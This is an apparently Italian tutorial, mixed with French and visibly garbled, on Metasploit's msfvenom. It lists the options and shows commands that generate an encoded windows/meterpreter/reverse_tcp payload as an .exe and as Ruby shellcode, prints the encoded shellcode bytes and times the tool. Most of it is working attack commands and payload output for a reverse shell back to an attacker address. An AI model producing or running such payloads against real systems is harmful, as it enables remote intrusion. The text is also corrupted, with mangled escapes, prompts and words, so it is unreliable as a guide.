Options:
-P, -- payload [payload] Payload to use. Specify a '-' or stdin to use M payloads
-L, -- list [module_type] List a module type example: payloads, encoders, nops, all
-N, -- nopsled [length] Prepend a nopsled of [length] size on to the payload
-F, -- format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-E, -- encoder [encoder] The encoder to use
-A, -- arch [architecture] The architecture to use
-- Platform [platform]
The platform of the payload
-S, -- space [length] The maximum size of the resulting payload
-B, -- bad-chars [list] The list of characters to avoid example: 'x00xff'
-I, -- iterations [count] The number of times to encode the payload
-X, -- template [path] Specify a custom executable file to use as a template
-K, -- keep Preserve the template behavior and inject the payload as a new thread
-H, -- help Show this message
Msfvenom-p <PAYLOAD>-e <ENCODER>-f <format de sortie> nomdefichier
Eg:
Msfvenom-p windows/meterpreter/reverse_tcp-f raw-e x86/systlhost = <notre ip> | msfvenom-e x86/shikata_ga_nai-a x86-platform windows-f exe> meter.exe
Sul sito rapid7è stato anche fatto un esempio dell 'uso dello script, ovvilla creazione di un payload (reverse_tcp ):
Fahrenheit: msf3 bannedit $ msfvenom-p windows/meterpreter/reverse_tcp-f ruby-e-I 3-s 480 LHOST = 192.168.0.120
[*] X86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 371 (iteration = 3)
Buf =
"Xd9xf7xd9x74x24xf4xbbx9cxecxeax8ax5fx2bxc9" +
"Xb1x50x31x5fx18x03x5fx18x83xefx60x0ex1fx31" +
"X11xe0xa4x2axfbx23xfdxc7xdfx2fxa4x16xd6x61" +
"X10x68xb2x95x20x60xbex95x7cx65x55x40x38x01" +
"X4bx51x78x5fx1fx36xdex3bx99x8cxb2x11xb3x8d" +
"X2dx4cx66x7cxbdx02x0bxa6xa9x1ax32x65xcfx75" +
"Xe8x15x1ax62x5fx69xe1xddx90x2ex2ex40xe0xb7" +
"X8bx16xfex15xdcx34x4cx4ex18x18x03x46x22xff" +
"Xa8x9bxf0xd5x4fxe0xfdxabx71x6ex43x03xd5x28" +
"X07x29x5exadx8fxd8xafxbdx69x06xf1xd1x4ex9b" +
"X01x7dx5ax75x54x76x90xdbx5ex7bx97x37xa4xab" +
"X2dxe2x17x8excfx4bxd0x3fxefxc6xffxe5x1cxc3" +
"X99x04x15x2excex5ex16x86x5ax2fx62x0ax32xe5" +
"Xe1xa4xd3x32x92x13xfdxcfxb6xa2x8bx97xcexf8" +
"X27x12xb0x6fxb5xa8x91x30x2cx14x40x2fx43xd8" +
"X45x46xd0x4cx58x59x8dx78x47xb2xdax79x6cxfa" +
"X07x43x18xc4x07x0ex2fxd0x71x84xcbx1cxabx01" +
"Xb0x17xedx07x1bxb0xcfxd1x25xc1x9bx62x7cxac" +
"X43x2ex52x36xb1xfcx61xbcx0ex56xdcxe1x9dxc2" +
"X29x3fxe9xf3xb1xe2x72x77x99x4bxf3xfcx83xd2" +
"X19x6dx53x4cx64xa0xddx38x82x3dx15x66x38x96" +
"X39xb3xa4xe3xffx07xb7x8ax23xcaxc6xafx57x64" +
"X3dxf3x23x63x42x30x90x3bx67x26x81x24x61xc3" +
"Xe4x51x75x30x47xf8x15xcbx21xe9x2ax30x9dx04" +
"X28xe3x37xb0xa4xaax1exf3"
Questo crea un payload in formato ruby, con l' encoder shikata_ga_nai, scelto automaticamente dal rank degli encoder, -s 480 indica che l' output non deve essere maggiore di 480 byte e in fineLHOST = 192.168.0.120 setta la variabile LHOST per usarla con il Payload.
Ci viene fatto anche un confronto sow.l 'aspetto della velocit à d' esecuzione.
Il primo esempio mostra il tempo di esecuzione di Msfvenom, mentre il secondo quello di msfpayload emsfencode insieme:
Fahrenheit: msf3 bannedit $ time./msfvenom-p windows/meterpreter/reverse_tcp-e-I 3 LHOST = 192.168.0.120-f ruby 1>/dev/null
[*] X86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 371 (iteration = 3)
Real 0m2. 744 s
User 0m2. 380 s
Sys 0m0. 367 s
Fahrenheit: msf3 bannedit $ time./msfpayload windows/meterpreter/reverse_tcp LHOST = 192.168.0.120 R |./msfencode-c 3 1>/dev/null
[*] X86/shikata_ga_nai succeeded with size 321 (iteration = 1)
[*] X86/shikata_ga_nai succeeded with size 348 (iteration = 2)
[*] X86/shikata_ga_nai succeeded with size 375 (iteration = 3)
Real 0m3. 070 s
User 0m4. 227 s
Sys 0m0. 778 s